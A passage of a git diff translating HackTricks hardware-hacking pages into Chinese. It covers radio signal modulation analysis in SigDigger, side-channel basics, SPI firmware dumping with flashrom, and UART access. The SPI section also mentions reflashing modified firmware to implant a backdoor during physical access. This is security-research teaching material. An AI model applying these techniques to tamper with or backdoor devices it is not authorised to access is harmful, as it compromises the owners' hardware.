-- Even if a signal is using Manchester codification (it's impossible to find more than two 0s or 1s in a row), you might **find several 1s or 0s together in the preamble**!
+- **在恢复比特后，您可能需要以某种方式处理它们**。例如，在曼彻斯特编码中，上+下将是1或0，下+上将是另一个。因此，1和0的对（上和下）将是真实的1或真实的0。
+- 即使信号使用曼彻斯特编码（不可能找到连续两个0或1），您也可能在前导码中**找到多个1或0**！
 
 ### Uncovering modulation type with IQ
 
-There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
-If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
+有3种方式在信号中存储信息：调制**幅度**、**频率**或**相位**。\
+如果您正在检查信号，有不同的方法可以尝试找出用于存储信息的方式（更多方法见下文），但一个好的方法是检查IQ图。
 
 ![](<../../images/image (788).png>)
 
-- **Detecting AM**: If in the IQ graph appears for example **2 circles** (probably one in 0 and other in a different amplitude), it could means that this is an AM signal. This is because in the IQ graph the distance between the 0 and the circle is the amplitude of the signal, so it's easy to visualize different amplitudes being used.
-- **Detecting PM**: Like in the previous image, if you find small circles not related between them it probably means that a phase modulation is used. This is because in the IQ graph, the angle between the point and the 0,0 is the phase of the signal, so that means that 4 different phases are used.
-  - Note that if the information is hidden in the fact that a phase is changed and not in the phase itself, you won't see different phases clearly differentiated.
-- **Detecting FM**: IQ doesn't have a field to identify frequencies (distance to centre is amplitude and angle is phase).\
-  Therefore, to identify FM, you should **only see basically a circle** in this graph.\
-  Moreover, a different frequency is "represented" by the IQ graph by a **speed acceleration across the circle** (so in SysDigger selecting the signal the IQ graph is populated, if you find an acceleration or change of direction in the created circle it could mean that this is FM):
+- **检测AM**：如果在IQ图中出现例如**2个圆圈**（可能一个在0，另一个在不同的幅度），这可能意味着这是一个AM信号。这是因为在IQ图中，0和圆圈之间的距离是信号的幅度，因此很容易可视化使用的不同幅度。
+- **检测PM**：如前图所示，如果您发现小圆圈彼此无关，这可能意味着使用了相位调制。这是因为在IQ图中，点与0,0之间的角度是信号的相位，这意味着使用了4种不同的相位。
+- 请注意，如果信息隐藏在相位变化的事实中，而不是相位本身，您将不会看到不同的相位清晰区分。
+- **检测FM**：IQ没有识别频率的字段（到中心的距离是幅度，角度是相位）。\
+因此，要识别FM，您应该**在此图中基本上只看到一个圆**。\
+此外，不同的频率通过IQ图的**速度加速穿过圆**来“表示”（因此在SysDigger中选择信号时，IQ图被填充，如果您发现创建的圆中的加速或方向变化，这可能意味着这是FM）：
 
 ## AM Example
 
@@ -70,29 +70,29 @@ If you are checking a signal there are different ways to try to figure out what
 
 #### Checking the envelope
 
-Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
+使用[**SigDigger** ](https://github.com/BatchDrake/SigDigger)检查AM信息，仅查看**包络**，您可以看到不同的清晰幅度水平。所使用的信号以AM发送脉冲信息，这就是一个脉冲的样子：
 
 ![](<../../images/image (590).png>)
 
-And this is how part of the symbol looks like with the waveform:
+这就是符号的一部分与波形的样子：
 
 ![](<../../images/image (734).png>)
 
 #### Checking the Histogram
 
-You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
+您可以**选择包含信息的整个信号**，选择**幅度**模式和**选择**，然后单击**直方图**。您可以观察到仅找到2个清晰的水平
 
 ![](<../../images/image (264).png>)
 
-For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
+例如，如果您在此AM信号中选择频率而不是幅度，您只会找到1个频率（没有信息调制在频率上仅使用1个频率）。
 
 ![](<../../images/image (732).png>)
 
-If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
+如果您发现很多频率，这可能不会是FM，可能信号频率只是因为频道而被修改。
 
 #### With IQ
 
-In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
+在此示例中，您可以看到有一个**大圆**，但也有**很多点在中心**。
 
 ![](<../../images/image (222).png>)
 
@@ -100,44 +100,44 @@ In this example you can see how there is a **big circle** but also **a lot of po
 
 #### With one symbol
 
-Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
+选择您能找到的最小符号（以确保它只是1），并检查“选择频率”。在这种情况下，它将是1.013kHz（即1kHz）。
 
 ![](<../../images/image (78).png>)
 
 #### With a group of symbols
 
-You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
+您还可以指示要选择的符号数量，SigDigger将计算1个符号的频率（选择的符号越多，可能越好）。在这种情况下，我选择了10个符号，“选择频率”为1.004 kHz：
 
 ![](<../../images/image (1008).png>)
 
 ### Get Bits
 
-Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
+发现这是一个**AM调制**信号和**符号率**（并且知道在这种情况下上升表示1，下降表示0），非常容易**获取信号中编码的比特**。因此，选择包含信息的信号并配置采样和决策，然后按下采样（检查**幅度**已选择，发现的**符号率**已配置，并选择了**Gadner时钟恢复**）：
 
 ![](<../../images/image (965).png>)
 
-- **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
-- **Manual** means that the indicated symbol rate is going to be used
-- In **Fixed interval selection** you indicate the number of intervals that should be selected and it calculates the symbol rate from it
-- **Gadner clock recovery** is usually the best option, but you still need to indicate some approximate symbol rate.
+- **同步到选择间隔**意味着如果您之前选择了间隔以找到符号率，则将使用该符号率。
+- **手动**意味着将使用指示的符号率
+- 在**固定间隔选择**中，您指示应选择的间隔数量，并从中计算符号率
+- **Gadner时钟恢复**通常是最佳选项，但您仍需指示一些近似的符号率。
 
-Pressing sample this appears:
+按下采样后，出现以下内容：
 
 ![](<../../images/image (644).png>)
 
-Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
+现在，为了让SigDigger理解**信息承载的水平范围**，您需要单击**较低水平**并保持按住，直到达到最高水平：
 
 ![](<../../images/image (439).png>)
 
-If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
+如果例如有**4个不同的幅度水平**，您应该将**每个符号的比特数配置为2**，并从最小值选择到最大值。
 
-Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
+最后，通过**增加****缩放**和**更改行大小**，您可以看到比特（您可以选择所有并复制以获取所有比特）：
 
 ![](<../../images/image (276).png>)
 
-If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
+如果信号每个符号有超过1个比特（例如2），SigDigger**无法知道哪个符号是**00、01、10、11，因此它将使用不同的**灰度**来表示每个（如果您复制比特，它将使用**0到3的数字**，您需要处理它们）。
 
-Also, use **codifications** such as **Manchester**, and **up+down** can be **1 or 0** and an down+up can be a 1 or 0. In those cases you need to **treat the obtained ups (1) and downs (0)** to substitute the pairs of 01 or 10 as 0s or 1s.
+此外，使用**编码**如**曼彻斯特**，上+下可以是**1或0**，而下+上可以是1或0。在这些情况下，您需要**处理获得的上升（1）和下降（0）**以替换成对的01或10为0或1。
 
 ## FM Example
 
@@ -147,19 +147,19 @@ Also, use **codifications** such as **Manchester**, and **up+down** can be **1 o
 
 #### Checking the frequencies and waveform
 
-Signal example sending information modulated in FM:
+发送信息调制在FM的信号示例：
 
 ![](<../../images/image (725).png>)
 
-In the previous image you can observe pretty good that **2 frequencies are used** but if you **observe** the **waveform** you might n**ot be able to identify correctly the 2 different frequencies**:
+在前面的图像中，您可以很好地观察到**使用了2个频率**，但如果您**观察**波形，您可能**无法正确识别这2个不同的频率**：
 
 ![](<../../images/image (717).png>)
 
-This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative:
+这是因为我在两个频率上捕获了信号，因此一个大约是另一个的负值：
 
 ![](<../../images/image (942).png>)
 
-If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
+如果同步频率**更接近一个频率而不是另一个**，您可以轻松看到这2个不同的频率：
 
 ![](<../../images/image (422).png>)
 
@@ -167,33 +167,32 @@ If the synchronized frequency is **closer to one frequency than to the other** y
 
 #### Checking the histogram
 
-Checking the frequency histogram of the signal with information you can easily see 2 different signals:
+检查带有信息的信号的频率直方图，您可以轻松看到2个不同的信号：
 
 ![](<../../images/image (871).png>)
 
-In this case if you check the **Amplitude histogram** you will find **only one amplitude**, so it **cannot be AM** (if you find a lot of amplitudes it might be because the signal has been losing power along the channel):
+在这种情况下，如果您检查**幅度直方图**，您将发现**只有一个幅度**，因此**不能是AM**（如果您发现很多幅度，可能是因为信号在频道中失去了功率）：
 
 ![](<../../images/image (817).png>)
 
-And this is would be phase histogram (which makes very clear the signal is not modulated in phase):
+这将是相位直方图（这清楚表明信号不是相位调制）：
 
 ![](<../../images/image (996).png>)
 
 #### With IQ
 
-IQ doesn't have a field to identify frequencies (distance to centre is amplitude and angle is phase).\
-Therefore, to identify FM, you should **only see basically a circle** in this graph.\
-Moreover, a different frequency is "represented" by the IQ graph by a **speed acceleration across the circle** (so in SysDigger selecting the signal the IQ graph is populated, if you find an acceleration or change of direction in the created circle it could mean that this is FM):
+IQ没有识别频率的字段（到中心的距离是幅度，角度是相位）。\
+因此，要识别FM，您应该**在此图中基本上只看到一个圆**。\
+此外，不同的频率通过IQ图的**速度加速穿过圆**来“表示”（因此在SysDigger中选择信号时，IQ图被填充，如果您发现创建的圆中的加速或方向变化，这可能意味着这是FM）：
 
 ![](<../../images/image (81).png>)
 
 ### Get Symbol Rate
 
-You can use the **same technique as the one used in the AM example** to get the symbol rate once you have found the frequencies carrying symbols.
+您可以使用**与AM示例中使用的相同技术**来获取符号率，一旦您找到了承载符号的频率。
 
 ### Get Bits
 
-You can use the **same technique as the one used in the AM example** to get the bits once you have **found the signal is modulated in frequency** and the **symbol rate**.
+您可以使用**与AM示例中使用的相同技术**来获取比特，一旦您**发现信号是频率调制的**和**符号率**。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md
index 5803cf9e9..bb98e4647 100644
--- a/src/todo/hardware-hacking/side_channel_analysis.md
+++ b/src/todo/hardware-hacking/side_channel_analysis.md
@@ -1,9 +1,7 @@
-# Side Channel Analysis Attacks 
+# Side Channel Analysis Attacks
 
-Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example: 
-
-Analysing the vibrations in glass sheets which is near the sound source, but the sound source is not accessible. The vibrations in glass are influenced by the sound source and if monitored and analysed, the sound can be decoded and interpreted.
-
-These attacks are very popular in case of leaking data such as private keys or finding operations in the processors. An electronic circuit is has a lot of channels from which, information is constantly leaked. Monitoring and analysing can be useful for diclosing a lot of information about the circuit and internals of it. 
+侧信道分析攻击是指通过某种其他渠道或来源来确定设备或实体的信息，这些渠道或来源对其有间接影响，并且可以从中提取信息。这可以通过一个例子更好地解释：
 
+分析靠近声源的玻璃板中的振动，但声源是不可接触的。玻璃中的振动受到声源的影响，如果进行监测和分析，可以解码和解释声音。
 
+在泄露数据的情况下，例如私钥或查找处理器中的操作，这些攻击非常流行。电子电路有很多渠道，从中不断泄露信息。监测和分析可以用于披露关于电路及其内部的很多信息。
diff --git a/src/todo/hardware-hacking/spi.md b/src/todo/hardware-hacking/spi.md
index a8a0dc64e..c4264f43c 100644
--- a/src/todo/hardware-hacking/spi.md
+++ b/src/todo/hardware-hacking/spi.md
@@ -2,59 +2,56 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-SPI (Serial Peripheral Interface) is an Synchronous Serial Communication Protocol used in embedded systems for short distance communication between ICs (Integrated Circuits). SPI Communication Protocol makes use of the master-slave architecture which is orchastrated by the Clock and Chip Select Signal. A master-slave architecture consists of a master (usually a microprocessor) that manages external peripherals like EEPROM, sensors, control devices, etc. which are considered to be the slaves.
+SPI（串行外设接口）是一种同步串行通信协议，用于嵌入式系统中IC（集成电路）之间的短距离通信。SPI通信协议利用主从架构，由时钟和芯片选择信号进行协调。主从架构由一个主设备（通常是微处理器）管理外部外设，如EEPROM、传感器、控制设备等，这些外设被视为从设备。
 
-Multiple slaves can be connected to a master but slaves can't communicate with each other. Slaves are administrated by two pins, clock and chip select. As SPI is an synchronous communication protocol, the input and output pins follow the clock signals. The chip select is used by the master to select a slave and interact with it. When the chip select is high, the slave device is not selected whereas when it's low, the chip has been selected and the master would be interacting with the slave.
+多个从设备可以连接到一个主设备，但从设备之间不能相互通信。从设备由两个引脚管理，时钟和芯片选择。由于SPI是一种同步通信协议，输入和输出引脚遵循时钟信号。芯片选择由主设备用于选择一个从设备并与之交互。当芯片选择为高时，从设备未被选择，而当其为低时，芯片已被选择，主设备将与从设备进行交互。
 
-The MOSI (Master Out, Slave In) and MISO (Master In, Slave Out) are responsible for data sending and recieving data. Data is sent to the slave device through the MOSI pin while the chip select is held low. The input data contains instructions, memory addresses or data as per the datasheet of the slave device vendor. Upon a valid input, the MISO pin is responsible for transmitting data to the master. The output data is sent exactly at the next clock cycle after the input ends. The MISO pins transmits data till the data is fully transmitter or the master sets the chip select pin high (in that case, the slave would stop transmitting and master would not listen after that clock cycle).
+MOSI（主设备输出，从设备输入）和MISO（主设备输入，从设备输出）负责数据发送和接收。数据通过MOSI引脚发送到从设备，同时芯片选择保持为低。输入数据包含指令、内存地址或根据从设备供应商的数据表的数据。在有效输入后，MISO引脚负责将数据传输到主设备。输出数据在输入结束后的下一个时钟周期准确发送。MISO引脚在数据完全传输完毕之前会继续传输数据，或者主设备将芯片选择引脚设置为高（在这种情况下，从设备将停止传输，主设备在下一个时钟周期后将不再接收）。
 
-## Dumping Firmware from EEPROMs
+## 从EEPROM中转储固件
 
-Dumping firmware can be useful for analysing the firmware and finding vulnerabilities in them. Often times, the firmware is not available on the internet or is irrelevant due to variations of factors like model number, version, etc. Hence, extracting the firmware directly from the physical device can be helpful to be specific while hunting for threats.
+转储固件对于分析固件和发现其中的漏洞非常有用。很多时候，固件在互联网上不可用或由于型号、版本等因素的变化而无关紧要。因此，直接从物理设备提取固件在寻找威胁时可以提供特定的帮助。
 
-Getting Serial Console can be helpful, but often times it happens that the files are read-only. This constrains the analysis due to various reasons. For example, a tools that are required to send and recieve packages would not be there in the firmware. So extracting the binaries to reverse engineer them is not feasible. Hence, having the whole firmware dumped on the system and extracting the binaries for analysis can be very helpful.
+获取串行控制台可能会很有帮助，但很多时候文件是只读的。这限制了分析的进行，原因有很多。例如，发送和接收数据包所需的工具可能不在固件中。因此，提取二进制文件进行逆向工程是不可行的。因此，将整个固件转储到系统中并提取二进制文件进行分析会非常有帮助。
 
-Also, during red reaming and getting physical access to devices, dumping the firmware can help on modifying the files or injecting malicious files and then reflashing them into the memory which could be helpful to implant a backdoor into the device. Hence, there are numerous possibilities that can be unlocked with firmware dumping.
+此外，在红队活动和获取设备的物理访问权限时，转储固件可以帮助修改文件或注入恶意文件，然后将其重新闪存到内存中，这可能有助于在设备中植入后门。因此，固件转储可以解锁许多可能性。
 
-### CH341A EEPROM Programmer and Reader
+### CH341A EEPROM编程器和读取器
 
-This device is an inexpensive tool for dumping firmwares from EEPROMs and also reflashing them with firmware files. This has been a popular choice for working with computer BIOS chips (which are just EEPROMs). This device connects over USB and needs minimal tools to get started. Also, it usually gets the task done quickly, so can be helpful in physical device access too.
+该设备是一个廉价的工具，用于从EEPROM中转储固件，并使用固件文件重新闪存。这是处理计算机BIOS芯片（实际上就是EEPROM）的热门选择。该设备通过USB连接，并需要最少的工具即可开始使用。此外，它通常能快速完成任务，因此在物理设备访问中也很有帮助。
 
 ![drawing](../../images/board_image_ch341a.jpg)
 
-Connect the EEPROM memory with the CH341a Programmer and plug the device into the computer. Incase the device is not getting detected, try installing drivers into the computer. Also, make sure that the EEPROM is connected in proper orientation (usually, place the VCC Pin in reverse orientation to the USB connector) or else, the software would not be able to detect the chip. Refer to the diagram if required:
+将EEPROM内存与CH341a编程器连接，并将设备插入计算机。如果设备未被检测到，请尝试在计算机上安装驱动程序。此外，请确保EEPROM以正确的方向连接（通常，将VCC引脚放置在与USB连接器相反的方向），否则软件将无法检测到芯片。如有需要，请参考图示：
 
 ![drawing](../../images/connect_wires_ch341a.jpg) ![drawing](../../images/eeprom_plugged_ch341a.jpg)
 
-Finally, use softwares like flashrom, G-Flash (GUI), etc. for dumping the firmware. G-Flash is a minimal GUI tool is fast and detects the EEPROM automatically. This can be helpful in the firmware needs to be extracted quickly, without much tinkering with the documentation.
+最后，使用flashrom、G-Flash（GUI）等软件转储固件。G-Flash是一个快速的最小GUI工具，能够自动检测EEPROM。这在需要快速提取固件时非常有帮助，而无需过多调整文档。
 
 ![drawing](../../images/connected_status_ch341a.jpg)
 
-After dumping the firmware, the analysis can be done on the binary files. Tools like strings, hexdump, xxd, binwalk, etc. can be used to extract a lot of information about the firmware as well as the whole file system too.
-
-To extract the contents from the firmware, binwalk can be used. Binwalk analyses for hex signatures and identifies the files in the binary file and is capabale of extracting them.
+转储固件后，可以对二进制文件进行分析。可以使用strings、hexdump、xxd、binwalk等工具提取有关固件以及整个文件系统的大量信息。
 
+要从固件中提取内容，可以使用binwalk。Binwalk分析十六进制签名并识别二进制文件中的文件，并能够提取它们。
 ```
 binwalk -e <filename>
 ```
-
-The can be .bin or .rom as per the tools and configurations used.
+可以是 .bin 或 .rom，具体取决于使用的工具和配置。
 
 > [!CAUTION]
-> Note that firmware extraction is a delicate process and requires a lot of patience. Any mishandling can potentially corrupt the firmware or even erase it completely and make the device unusable. It is recommended to study the specific device before attempting to extract the firmware.
+> 请注意，固件提取是一个精细的过程，需要大量的耐心。任何处理不当都可能导致固件损坏甚至完全擦除，使设备无法使用。建议在尝试提取固件之前研究特定设备。
 
 ### Bus Pirate + flashrom
 
 ![](<../../images/image (910).png>)
 
-Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and **MISO** to connect to SPI however some SPIs may indicate pins as DI and DO. **MOSI -> DI, MISO -> DO**
+请注意，即使 Pirate Bus 的引脚图指示用于连接 SPI 的 **MOSI** 和 **MISO** 引脚，某些 SPI 可能将引脚标记为 DI 和 DO。**MOSI -> DI, MISO -> DO**
 
 ![](<../../images/image (360).png>)
 
-In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like:
-
+在 Windows 或 Linux 上，您可以使用程序 [**`flashrom`**](https://www.flashrom.org/Flashrom) 来转储闪存内容，运行类似以下命令：
 ```bash
 # In this command we are indicating:
 # -VV Verbose
@@ -63,6 +60,4 @@ In Windows or Linux you can use the program [**`flashrom`**](https://www.flashro
 # -r <file> Image to save in the filesystem
 flashrom -VV -c "W25Q64.V" -p buspirate_spi:dev=COM3 -r flash_content.img
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/hardware-hacking/uart.md b/src/todo/hardware-hacking/uart.md
index 4a5af6a49..ed27dd8bf 100644
--- a/src/todo/hardware-hacking/uart.md
+++ b/src/todo/hardware-hacking/uart.md
@@ -2,84 +2,77 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-UART is a serial protocol, which means it transfers data between components one bit at a time. In contrast, parallel communication protocols transmit data simultaneously through multiple channels. Common serial protocols include RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, and USB.
+UART是一种串行协议，这意味着它一次传输一个比特的数据。相比之下，平行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、以太网、HDMI、PCI Express和USB。
 
-Generally, the line is held high (at a logical 1 value) while UART is in the idle state. Then, to signal the start of a data transfer, the transmitter sends a start bit to the receiver, during which the signal is held low (at a logical 0 value). Next, the transmitter sends five to eight data bits containing the actual message, followed by an optional parity bit and one or two stop bits (with a logical 1 value), depending on the configuration. The parity bit, used for error checking, is rarely seen in practice. The stop bit (or bits) signify the end of transmission.
+通常，在UART处于空闲状态时，线路保持高电平（逻辑1值）。然后，为了信号数据传输的开始，发射器向接收器发送一个起始位，此时信号保持低电平（逻辑0值）。接下来，发射器发送五到八个数据位，包含实际消息，后面跟着一个可选的奇偶校验位和一个或两个停止位（逻辑1值），具体取决于配置。用于错误检查的奇偶校验位在实际中很少见。停止位（或位）表示传输结束。
 
-We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
+我们称最常见的配置为8N1：八个数据位，无奇偶校验和一个停止位。例如，如果我们想在8N1 UART配置中发送字符C，或ASCII中的0x43，我们将发送以下位：0（起始位）；0, 1, 0, 0, 0, 0, 1, 1（0x43的二进制值），和0（停止位）。
 
 ![](<../../images/image (764).png>)
 
-Hardware tools to communicate with UART:
+与UART通信的硬件工具：
 
-- USB-to-serial adapter
-- Adapters with the CP2102 or PL2303 chips
-- Multipurpose tool such as: Bus Pirate, the Adafruit FT232H, the Shikra, or the Attify Badge
+- USB转串行适配器
+- 带有CP2102或PL2303芯片的适配器
+- 多功能工具，如：Bus Pirate、Adafruit FT232H、Shikra或Attify Badge
 
-### Identifying UART Ports
+### 识别UART端口
 
-UART has 4 ports: **TX**(Transmit), **RX**(Receive), **Vcc**(Voltage), and **GND**(Ground). You might be able to find 4 ports with the **`TX`** and **`RX`** letters **written** in the PCB. But if there is no indication, you might need to try to find them yourself using a **multimeter** or a **logic analyzer**.
+UART有4个端口：**TX**（发送）、**RX**（接收）、**Vcc**（电压）和**GND**（接地）。您可能会在PCB上找到带有**`TX`**和**`RX`**字母的4个端口。但如果没有指示，您可能需要使用**万用表**或**逻辑分析仪**自己寻找它们。
 
-With a **multimeter** and the device powered off:
+使用**万用表**并关闭设备电源：
 
-- To identify the **GND** pin use the **Continuity Test** mode, place the back lead into ground and test with the red one until you hear a sound from the multimeter. Several GND pins can be found the PCB, so you might have found or not the one belonging to UART.
-- To identify the **VCC port**, set the **DC voltage mode** and set it up to 20 V of voltage. Black probe on ground and red probe on the pin. Power on the device. If the multimeter measures a constant voltage of either 3.3 V or 5 V, you’ve found the Vcc pin. If you get other voltages, retry with other ports.
-- To identify the **TX** **port**, **DC voltage mode** up to 20 V of voltage, black probe on ground, and red probe on the pin, and power on the device. If you find the voltage fluctuates for a few seconds and then stabilizes at the Vcc value, you’ve most likely found the TX port. This is because when powering on, it sends some debug data.
-- The **RX port** would be the closest one to the other 3, it has the lowest voltage fluctuation and lowest overall value of all the UART pins.
+- 要识别**GND**引脚，请使用**连续性测试**模式，将黑色引线放入接地，并用红色引线测试，直到您听到万用表发出声音。PCB上可能会找到多个GND引脚，因此您可能找到或未找到属于UART的引脚。
+- 要识别**VCC端口**，请设置**直流电压模式**并将其设置为20 V电压。黑色探头接地，红色探头接引脚。打开设备电源。如果万用表测量到恒定电压为3.3 V或5 V，则您找到了Vcc引脚。如果您得到其他电压，请尝试其他端口。
+- 要识别**TX** **端口**，将**直流电压模式**设置为20 V电压，黑色探头接地，红色探头接引脚，并打开设备电源。如果您发现电压波动几秒钟后稳定在Vcc值，则您很可能找到了TX端口。这是因为在开机时，它会发送一些调试数据。
+- **RX端口**将是与其他3个端口最接近的，它的电压波动最低，所有UART引脚中整体值最低。
 
-You can confuse the TX and RX ports and nothing would happen, but if you confuses the GND and the VCC port you might fry the circuit.
+您可以混淆TX和RX端口，没什么问题，但如果混淆GND和VCC端口，可能会烧毁电路。
 
-In some target devices, the UART port is disabled by the manufacturer by disabling RX or TX or even both. In that case, it can be helpful to trace down the connections in the circuit board and finding some breakout point. A strong hint about confirming no detection of UART and breaking of the circuit is to check the device warranty. If the device has been shipped with some warranty, the manufacturer leaves some debug interfaces (in this case, UART) and hence, must have disconnected the UART and would attach it again while debugging. These breakout pins can be connected by soldering or jumper wires.
+在某些目标设备中，制造商通过禁用RX或TX甚至两者来禁用UART端口。在这种情况下，追踪电路板中的连接并找到一些断点可能会有所帮助。确认没有检测到UART和电路断开的一个强烈提示是检查设备保修。如果设备附带某些保修，制造商会留下某些调试接口（在这种情况下为UART），因此，必须已断开UART并在调试时重新连接。这些断点引脚可以通过焊接或跳线连接。
 
-### Identifying the UART Baud Rate
+### 识别UART波特率
 
-The easiest way to identify the correct baud rate is to look at the **TX pin’s output and try to read the data**. If the data you receive isn’t readable, switch to the next possible baud rate until the data becomes readable. You can use a USB-to-serial adapter or a multipurpose device like Bus Pirate to do this, paired with a helper script, such as [baudrate.py](https://github.com/devttys0/baudrate/). The most common baud rates are 9600, 38400, 19200, 57600, and 115200.
+识别正确波特率的最简单方法是查看**TX引脚的输出并尝试读取数据**。如果您收到的数据不可读，请切换到下一个可能的波特率，直到数据变得可读。您可以使用USB转串行适配器或像Bus Pirate这样的多功能设备来做到这一点，并配合一个辅助脚本，例如[baudrate.py](https://github.com/devttys0/baudrate/)。最常见的波特率为9600、38400、19200、57600和115200。
 
 > [!CAUTION]
-> It's important to note that in this protocol you need to connect the TX of one device to the RX of the other!
+> 重要的是要注意，在此协议中，您需要将一个设备的TX连接到另一个设备的RX！
 
-## CP210X UART to TTY Adapter
+## CP210X UART到TTY适配器
 
-The CP210X Chip is used in a lot of prototyping boards like NodeMCU (with esp8266) for Serial Communication. These adapters are relatively inexpensive and can be used to connect to the UART interface of the target. The device has 5 pins: 5V, GND, RXD, TXD, 3.3V. Make sure to connect the voltage as supported by the target to avoid any damage. Finally connect the RXD pin of the Adapter to TXD of the target and TXD pin of the Adapter to RXD of the target.
+CP210X芯片广泛用于许多原型板，如NodeMCU（带esp8266）进行串行通信。这些适配器相对便宜，可以用于连接目标的UART接口。该设备有5个引脚：5V、GND、RXD、TXD、3.3V。确保连接目标支持的电压，以避免任何损坏。最后，将适配器的RXD引脚连接到目标的TXD，将适配器的TXD引脚连接到目标的RXD。
 
-Incase the adapter is not detected, make sure that the CP210X drivers are installed in the host system. Once the adapter is detected and connected, tools like picocom, minicom or screen can be used.
-
-To list the devices connected to Linux/MacOS systems:
+如果适配器未被检测到，请确保主机系统中已安装CP210X驱动程序。一旦适配器被检测到并连接，可以使用picocom、minicom或screen等工具。
 
+要列出连接到Linux/MacOS系统的设备：
 ```
 ls /dev/
 ```
-
-For basic interaction with the UART interface, use the following command:
-
+要与UART接口进行基本交互，请使用以下命令：
 ```
 picocom /dev/<adapter> --baud <baudrate>
 ```
-
-For minicom, use the following command to configure it:
-
+对于minicom，请使用以下命令进行配置：
 ```
 minicom -s
 ```
+在 `Serial port setup` 选项中配置波特率和设备名称等设置。
 
-Configure the settings such as baudrate and device name in the `Serial port setup` option.
+配置完成后，使用命令 `minicom` 启动以获取 UART 控制台。
 
-After configuration, use the command `minicom` to start get the UART Console.
+## 通过 Arduino UNO R3 的 UART（可拆卸的 Atmel 328p 芯片板）
 
-## UART Via Arduino UNO R3 (Removable Atmel 328p Chip Boards)
+如果没有 UART 串行到 USB 适配器，可以使用 Arduino UNO R3 进行快速破解。由于 Arduino UNO R3 通常随处可用，这可以节省很多时间。
 
-Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used with a quick hack. Since Arduino UNO R3 is usually available anywhere, this can save a lot of time.
+Arduino UNO R3 板上内置了 USB 到串行适配器。要获取 UART 连接，只需将 Atmel 328p 微控制器芯片从板上拔出。此破解适用于 Atmel 328p 未焊接在板上的 Arduino UNO R3 变体（使用的是 SMD 版本）。将 Arduino 的 RX 引脚（数字引脚 0）连接到 UART 接口的 TX 引脚，将 Arduino 的 TX 引脚（数字引脚 1）连接到 UART 接口的 RX 引脚。
 
-Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface.
-
-Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface.
+最后，建议使用 Arduino IDE 获取串行控制台。在菜单的 `tools` 部分，选择 `Serial Console` 选项，并根据 UART 接口设置波特率。
 
 ## Bus Pirate
 
-In this scenario we are going to sniff the UART communication of the Arduino that is sending all the prints of the program to the Serial Monitor.
-
+在这种情况下，我们将嗅探 Arduino 的 UART 通信，该通信将程序的所有打印信息发送到串行监视器。
 ```bash
 # Check the modes
 UART>m
@@ -99,39 +92,39 @@ x. exit(without change)
 # Select UART
 (1)>3
 Set serial port speed: (bps)
- 1. 300
- 2. 1200
- 3. 2400
- 4. 4800
- 5. 9600
- 6. 19200
- 7. 38400
- 8. 57600
- 9. 115200
+1. 300
+2. 1200
+3. 2400
+4. 4800
+5. 9600
+6. 19200
+7. 38400
+8. 57600
+9. 115200
 10. BRG raw value
 
 # Select the speed the communication is occurring on (you BF all this until you find readable things)
 # Or you could later use the macro (4) to try to find the speed
 (1)>5
 Data bits and parity:
- 1. 8, NONE *default
- 2. 8, EVEN
- 3. 8, ODD
- 4. 9, NONE
+1. 8, NONE *default
+2. 8, EVEN
+3. 8, ODD
+4. 9, NONE
 
